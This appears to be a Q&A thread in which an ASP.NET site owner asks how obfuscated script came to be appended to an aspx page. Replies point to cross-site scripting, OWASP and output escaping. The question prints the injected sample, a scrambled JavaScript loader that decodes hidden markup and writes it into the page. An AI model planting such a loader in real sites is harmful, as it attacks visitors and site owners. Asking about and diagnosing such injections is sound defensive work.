# code being inserted

Tags: asp.net, security

Today I found that my site was down...I turned the errors to off and tracked the error.
It turned out that there was some code added to the bottom of my aspx page..(please find the code below). Obviously since the code had some html tag which my aspx page didnot allow..resulted in an error.

I donot know what scenerios I should check that could have a loophole that someone is able to insert code into my aspx page?

```
<html>
 <body>
<script>
var a='';
var b='%2/tafod%h2b233 Cstx-ri2%%32d%i e%/i.nci5g%e%%% 30hisen%h2%%r0/ irt-cis232D0e2f %22mcmimt2t2o2CEr%%nrae2%h2r%%a mDAlmu.w2i5mDEe fcpahch%D0%fr2r a33aond02e2a33m ';
var c='5314869720';
for(var i=0;i<16;i++) for(var j=0;j<10;j++) a+=b.charAt((parseInt(c.charAt(j))*16)+i);
document.writeln(unescape(a));
</script>
</body>    
</html>
```

Comment: What kind of website is it? Do you allow your visitors to insert some text on your website? (shoutbox, forum...)

Comment: [AntiXSS](http://wpl.codeplex.com/)

Comment: @Tim Schmelter - that's what we use, too!  I love it.

Comment: walther, NO I donot have a forum..but yes there are various pages where textboxes are made use of!

Comment: Does your website actually write to .ASPX files then? What are you running, is it a content management system. Yes it looks like XSS, but the script usually ends up in a database or other storage, not the physical file.

Answer (score 1, accepted):

It looks like [cross-site scripting (XSS)](https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29) to me.  It's the #2 most common attack out there, right after SQL Injection.

No offense meant, I don't know your experience/background, but if you're not aware of XSS, and you're a web developer, I strongly suggest reading up.  OWASP is a great resource.

XSS not only affects people going to your website, but thanks to [CSRF (Cross-Site Request Forgery)](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29) XSS can be leveraged to [attack on other websites](http://www.codinghorror.com/blog/2008/09/cross-site-request-forgeries-and-you.html) that your viewers are logged into, so it affects not just you and your website, but others as well.

Comment: by the way...if I had code inserted into one page..can I assume that this particular page has a problem?

Comment: You can assume that this particular page has a problem, but not that ONLY this particular page has a problem.  The short version of all  you're about to read up on is to always escape all untrusted data before spitting it out on the page.  This means any text coming from a database, textbox, etc.  As @TimSchmelter suggested, since you're using .NET, use the web protection library, and read the link on NiK's answer as well.  Good luck!

Comment: As a final note, every web developer on earth should know about the OWASP Top 10 vulnerabilities.  There are more than just 10, but if every web developer prevented these, the web would be a MUCH safer place.  https://www.owasp.org/index.php/Top_10_2010-Main  Spread the word if you find it helpful.

Answer (score 1):

Yes David is right...you may start off reading [Prevent Cross-Site Scripting](http://msdn.microsoft.com/en-us/library/ff649310.aspx)

hope this helps...